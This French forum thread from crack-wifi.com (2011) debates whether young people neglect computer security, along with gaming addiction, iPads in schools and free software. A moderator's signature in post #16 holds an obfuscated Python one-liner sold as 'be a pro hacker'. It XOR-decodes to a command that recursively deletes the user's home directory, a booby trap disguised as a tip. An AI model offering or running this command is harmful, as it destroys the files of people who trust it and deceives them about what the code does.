Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 02-04-2011 22:47:41

toto
Membre V.I.P.
Lieu : chez le docteur aussi

nos jeunes se foute de leurs sécurité

Salut

aujourd'hui je suis sortis de chez moi en dehors de mon obligation d'aller bosser je ne passe le plus clair de mon temps que sur mon pc enfin bref je suis aller aider une amie elle et sa copine viennent d' emménager maman de deux jeunes gamer qui ne connaisse que leurs compte steam ils étais tous penaud de ne plus avoir de connexion

je leurs et donc prêter mes deux alfa qui ne me serve plus depuis belle lurette ainsi que mes code free-wifi

et la surprise je les interroges vous avez quoi comme antivirus ? ben on en a pas !

euh au moins un pare feu ? non plus !

ô_Ô vous achetez sur le net ? oui des objet virtuel pour nos personnages ...

c un peu léger comme protection mais j'en viens a me dire que je suis peut être trop parano

mais quand même il serais bon je pense que lors de l'entrée en 6eme on leurs donne un cour théorique sur la sécurité informatique pour les sensibiliser un poil qu'en pensez vous ?

moi du coup je me suis dit bon je leurs parle pas de dns spoofing de mitm ou de trojan indetectable je vais passer pour un vieux ennuyant smile

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 02-04-2011 22:54:36

Squaks
Membre Irremplaçable

Re : nos jeunes se foute de leurs sécurité

C'est pas pour lancer un troll (quoique roll) mais a quoi sert un antivirus quand on sait avec quelles facilité on peut les bypasser ?

Sharkoff

#3 02-04-2011 23:02:31

toto
Membre V.I.P.

non c pas un troll et oui je sais qu'un AV se bypass mais les gens qui font ça le font il tous pour nuire je ne pense pas enfin là on en reviens a ma crédulité peut être

#4 02-04-2011 23:15:31

raylook
Membre d'Or
Lieu : dans ton disque dur !!
Site Web

mais quand même il serais bon je pense que lors de l'entrée en 6eme on leurs donne un cour théorique sur la sécurité informatique pour les sensibiliser un poil qu'en pensez vous ?

Je suis d'accord même si je crois que que ca serait plutôt aux parents qu'il faudrait donner des cours sur la sécurité de base d'un ordinateur, pour une enfant qui entre en 6eme ca peut être ludique mais pas suffisant,  c'est donc les parents qui doivent accompagner leurs enfants et les sensibilisé aux danger d'internet wink

"nos jeunes se foute de leurs sécurité" , moi je dirais plutôt "Les parents se foutent de la sécurité.."

fete.gif

#5 03-04-2011 00:36:55

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Moi ce qui me fait peur dans l'histoire c'est de voir de très jeunes gens jouer comme des malades.
Perso si j'étais les parents il n'y aurait aucun jeux à la baraque.

Je précise quand même, je commence à être et à penser comme un "vieux co.." ça fait aucun doute, on ne rajeunit pas avec l'age smile.
Mais je ne dit pas ça dans le vide. Je le dit car j'ai moi même été un très gros gamer.
Medal of honor, CS, 4 ans de WOW, (tauren bien sur smile), et j'en ai vu un bon paquet se noyer la dedans en famille.
Moi même j'ai mis du temps à arriver à en sortir, j'y ai perdu pas mal de choses de temps et d'ami(e)s.

Sans même m'en rendre compte.

J'ai eu de la chance d'arriver à en sortir quand même, mais beaucoup de mes amis eux n'en sont pas encore sortis.
De Wow surtout, c'est de l'héroïne en vente libre ce jeux. Ou alors ils en sont sortit et ont replongé de plus belle.

Donc pour ma part et comme d'hab je vais voir les choses de manière plus large.

Je considère à bien y réfléchir, qu'il est moins dangereux de se balader sans antivirus sur le net que de risquer de tomber accroc à un jeux en ligne. (Ou à tout autre chose d'ailleurs).

D'un côté au pire, tu te tapes un formatage.
De l'autre tu peux perdre de nombreuses années de ta vie, perdre des amis voir pire.

Jusqu'à présent si je compare en terme de gravité, la plus part des gens que je connais y on plus perdu à jouer, qu'à ne rien y connaitre en Sécurité informatique wink

Faites vos jeux smile

Si il fallait sensibiliser les jeunes à tous les risques, dont beaucoup sont relatifs à ce que le gens connaissent et auxquels ils accordent de l'importance.
Par exemple nous c'est l'informatique, pour d'autre ce sera le sport etc etc....

Chacun aurait une bonne raison de trouver normal de leur apprendre telle ou telle chose...
Il leur faudrait faire 25 ans d'études smile,  voir une vie entière....
Au final ils n'y attacheraient plus d'importance et ne seraient pas plus vigilants.

Je pense qu'il faut surtout leur apprendre la modération smile

Mais la je ne parle bien sur la que de l'aspect technique bien sur.
Au niveau des comportements en ce qui concerne les nouveaux mode de communication.
Les réseaux sociaux etc etc.. la façon dont il gèrent leur image, il n'est pas inutile de les mettre en garde en revanche.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#6 03-04-2011 08:03:29

toto
Membre V.I.P.

ah un pavé hihi

je suis ok nous voyons les choses selon nos critéres le dernier jeu que j'ai utliser c sonic ^^ ensuite j'ai pas accroché

une grande majorités des adultes ne t'aime que pour ce que tu (peut) leurs apporte(r) et leurs image social "j'ai une belle femme une belle voiture une belle maison des avoirs pleins mes placards des enfants que je ne sais pas pourquoi je les ai fait" les clichés de certains adultes sont vraiment a gerber et voir les jeunes se réfugié dans une passions comme les jeux vidéos ne me surprend pas

ont il vraiment les moyens d'echapper a un systéme qui n'a pas de place pour eux a part celui de consommer de l'inutile paraitre grace a des paillettes tu as une audi une villa avec piscine tu est directeur de ta société ta femme t'aime car tu lui as acheter des seins et une garde robe qui rendra jalouse toutes ses amie ...

tu feras des fêtes mémorable et tes amis viendront il vraiment pour toi ou pour ta piscine ça tu te pose pas la question car tu vis le cliché suprême tu as réussi socialement ...

est ce vraiment cela les élites de la société j'en doute ...

mais bon on s'ecarte du sujet là

l'éducation et la sécurité informatique c'est vrai n'est pas le seul point a aborder, mais il est important a "mes" yeux, il y en a beaucoup d'autres que je n'aborderai pas car ce n'est pas le bon endroit pour cela smile

#7 03-04-2011 11:20:30

noireaude
Membre d'honneur
Site Web

Je pense que de toute façon cela viendra tôt ou tard, pas mal d'écoles se sont déjà dotées d'un parc informatique, pour en initier les collégiens ou les lycéens.
Il y a même eu des projets pilotes ou des classes entières ont eues des Ipad à la place des livres.
Ils ont appelés cela le cartable Numérique.
Si on compare à l'age de notre système éducatif, l'informatique est une science nouvelle.
Je pense que dans les années qui viendront, il y a de grandes chances pour que cela devienne une matière à part entière et ce dès le plus jeune age.

Il faut quand même prendre garde à une chose que je trouve terrible de mon point de vue.

L'école à on le sait une vertu éducative, à ce titre filer des Ipads à des élèves ne leur apprend pas à maîtriser leur informatique, mais à utiliser un ordinateur et ou plutôt un produit.

Pour ma part c'est très grave, car on ne leur apprend juste au final qu'à devenir des consommateurs.

Tout le monde le sait maintenant changer ces habitudes est très difficile quand on a été formaté, Microsoft et Apple l'ont très bien compris.

Ils commencent par donner gracieusement leur produits à des écoles qui de toute façon n'auraient pas forcément eues le budget pour s'équiper.
Il savent très bien que plus tard les élèves achèterons leur produits qui la ne seront plus gratuits.
Quand on regarde ça de plus près on comprend très vit que ce n'est pas gratuit et encore moins altruiste.

C'est un lavage de cerveau organisé. Je trouve cela aussi malsain qu'un collège qui placerait un distributeur de cigarettes ou d'alcool gratuit pour habituer les enfants à utiliser telle ou telle marque.

Si on veut éduquer les élèves à la sécurité informatique, ce qui implique de leur apprendre à maîtriser leur informatique, alors l'éducation nationale doit commencer par refuser le logiciel propriétaire et passer entièrement aux logiciels libres et non pas se prostituer auprès de grandes firmes malsaines.

Si ils ne le font pas, ils se transforment en VRP et je ne pense pas que cela soit le rôle de l'éducation Nationale.

C'est pas gagné.

Pour le reste c'est vrai que ce n'est pas le sujet, néanmoins tu n'as pas tort, j'ai déjà abordé le sujet ici ou la, mais il est trop vaste lol.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#8 06-04-2011 21:55:47

M1ck3y
Administrateur
Lieu : Lost in the darkness

A mon humble avis, il est tout aussi dangereux de devenir un hardcore gamer avec les risques et conséquences sur la santé et la vie sociale que cela comporte que de s'exposer à se faire subtiliser ses informations bancaires et usurper son identité sur le net. Ce sont deux choses qui sont destructrices, mais de deux façons différentes, le gros gamer se détruit lui meme à la manière d'un toxico et le pauvre inconscient qui surfe et achète online sur une machine vulnérable telle un gruyère se crée des problèmes du fait de son ignorance.

Je ne pense pas qu'on en arrivera à former les masses à la sécurité informatique, tout au plus on sensibilise les débutants à certaines pratiques (phishing par exemple) histoire qu'ils ne partent pas droit dans le mur lorsqu'ils se retrouveront seuls sur la toile. Ca me fait penser au vendeur de scooter qui se contente de dire à son client: les freins sont là. Il a juste oublié de lui dire que ça pousse très fort, et il ira s'encadrer au premier virage... Le but des autorités est de maitriser le net comme en témoignent les textes de loi qui sortent ces derniers temps, tous plus liberticide les uns que les autres, éduquer les jeunes sur la sécurité de leurs informations ne va pas dans ce sens, si ils se mettent à réfléchir ça deviendra plus dur de les fliquer...

Pour ce qui est de flier des Ipads à l'école, c'est non seulement scandaleux car c'est de l'argent public (nos impots donc) qui est gaspillé, mais en plus c'est l'apologie d'Apple, j'espère au moins qu'ils ont payé cette vaste campagne de pub qui leur amène sur un plateau de jeunes clients prets à se faire racketter sur itunes. Quans tu pense qu'un bon petit netbook avec une distribution linux dessus coute deux à trois fois moins cher, c'est carrément criminel!

#9 06-04-2011 22:10:16

Cahaleen
Membre Radioactif
Lieu : Paris

Je ne suis pas tout à fait d'accord avec toi M1ck3y, je crois au contraire que les débutants vont petit à petit disparaître. On a vu le même phénomène se produire d'abord avec la lecture qui était réservée à une élite. Puis petit à petit, au fil des âges celle-ci s'est popularisée pour aujourd'hui devenir un outil que tout le monde (ou presque) maitrise dans notre société. Il en a été de même pour l'écriture, la culture générale scientifique... Bref tout entre un jour ou l'autre dans l'éducation.

Quand je regarde autour de moi, je peux constater que malgré mes connaissances très légère je suis considéré comme un geek^^ (et je ne suis pas vieux!) Mais quand je regarde la génération des mes petits frères qui n'ont que 8 ans de moins, leurs connaissances sont déjà bien plus communes. Je pense qu'à la façon de la lecture, l'informatique va se généraliser et les gens auront de plus en plus de connaissances.

Par contre je pense qu'ils seront probablement toujours autant vulnérables car il y aura toujours des gens avec beaucoup plus de connaissances pour exploiter ceux qui en ont moins. Et je suis plutôt d'accord avec Noireaude, l'informatique entrera d'ici peu comme matière à l'école. D'ailleurs mes frères n'ont certes pas de cours d'informatique à proprement parler, mais ont déjà des cours de méthodologie de l'outil informatique par-ci par-là. De là à ce que ça devienne une matière à part entière, il n'y a qu'un pas!

Quant aux lois qui peuvent apparaître, j'y suis opposé pour le principe. Mais en pratique, on constate de plus en plus qu'elles ne servent pas tellement.

Je me demande d'ailleurs s'il sera réellement possible un jour de censurer internet. Personnellement j'en doute, mais il parait que je suis un optimiste de nature!

#10 06-04-2011 22:30:50

M1ck3y
Administrateur

En fait, le mot "débutant" désigne un état de fait à un instant t. Il y a 20 ans, un débutant était quelqu'un qui commençait à apprivoiser son 486 en installant un programme de quelques Mo stocké sur des disquettes. Aujourd'hui le débutant essaie d'utiliser msn et d'installer le driver de sa webcam. Le contexte est différent et les risques le sont aussi. Certes, les jeunes générations, technophiles par nature, sont en général moins susceptibles de se laisser prendre au jeu du mail scam qui demande d'envoyer 10000$ par western union, mais ce sont les memes jeunes qui risquent le plus de se faire subtiliser des informations persos à cause d'une appli facebook malicieuse. Tous les jeunes n'ont pas forcément envie de s'intéresser à la sécurité informatique.

Pour ce qui est de la censure du net, elle est déja en marche, elle arrive sournoisement mais surement.

#11 06-04-2011 22:43:08

Cahaleen
Membre Radioactif
Lieu : Paris

Oui, comme disait notre cher Einstein : "Tout est relatif!" On n'entendait donc pas la même chose par débutant.

Par contre pour ce qui est de la censure je suis curieux d'en savoir un peu plus. Je croyais que ça relevait un peu de la science fiction... Par contre il faudrait peut-être en parler dans autre topic?

[Edit] Compris chef!!

Dernière modification par Cahaleen (06-04-2011 23:03:14)

#12 06-04-2011 22:53:09

M1ck3y
Administrateur

Je te laisse chercher un peu sur le forum, on en discute dans plusieurs sujets, quand tu vois les lois qui sortent au fur et à mesure tu comprends ou on va en arriver, et ce n'est pas de la science fiction. En effet si tu veux lancer une discussion là dessus, un nouveau sujet serait une bonne chose pour ne pas polluer le topic de toto.

#13 06-04-2011 23:41:02

noireaude
Membre d'honneur
Site Web

Cahaleen a écrit :

Oui, comme disait notre cher Einstein : "Tout est relatif!"

Ma préféré du lui reste quand même : "Il y a deux choses qui sont infinies, dont une dont je ne suis pas encore certain.
                                                         L'univers et la bêtise humaine" smile

Je met le pavé au four en cas de nouveau topic smile

#14 13-04-2011 12:07:01

Lulu
Membre d'honneur
Lieu : Dans le noooord !

Les jeunes ne s'imaginent pas en danger sur le net donc ne font pas attention à leur sécurité. Si personne ne les mets en gardent, leur explique les choses, comment le deviner ? Comme dit M1ck3y très peu de jeunes ne s'intéressent pas a la sécurité sur le net. tout ce qui leur importent c'est de jouer a tel jeu car ils ont rencart avec un pote, de facebooker leur life et de chatter sur msn avec leur pote parce que les parents sont nuls et ils ne comprennent rien ! ils utilisent un pc sans même connaitre les bases. Beaucoup de personnes achètent un pc s'en servent direct ! sans même se préoccuper d'un AV, d'un firewall ou même de faire les disques de réinstall !

Même en ayant fait des études en informatique la sécurité n'est pas  un sujet abordé comme il le devrait !Il est bien plus important de faire des cours magistraux mais qui resteront au fond d'un classeur...

M1ck3y addict

#15 13-04-2011 20:00:28

noireaude
Membre d'honneur
Site Web

Sans compter que même si tu connais le classeur par coeur, les menaces évoluent tellement vite que cela ne servirait à rien.
Pour être à peu près au courant des menaces potentielles c'est quasiment de la formation continue obligatoire.

#16 13-04-2011 20:46:26

spawn
Modérateur

Personnellement, les seuls jeunes que je connais qui se sont intéressés à la sécu se sont achetés un Mac.
Ils sont bons à la com' d'Apple.
(on ne parlera pas d'Airport pour ne pas les vexer.. ^^)

Les iPad en classe, c'est carrément scandaleux. On ferait mieux de leur payer des profs.

Plutôt que de parler d'antivirus, (utiles sous Windows), parlons d'Ubuntu. Ubuntu est jolie.
(Et sous Ubuntu, pas de risque de chute dans le jeu vidéo.. hmm )

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#17 13-04-2011 20:57:15

noireaude
Membre d'honneur
Site Web

spawn a écrit :

Ubuntu est jolie.
(Et sous Ubuntu, pas de risque de chute dans le jeu vidéo.. hmm )

C'est une des choses qui coincent pour le passage au grand publique.
Le dual boot règle vite le problème en théorie.
Mais beaucoup de gens chez qui j'ai mis cela en place pour qu'ils puissent jouer sous Windows et faire le reste sur Mint ou Ubuntu se lassent des re démarrages.

Au final ils ont Bien GNU/Linux sur leur DD mais finissent par ne plus s'en servir par flemme.

Annonce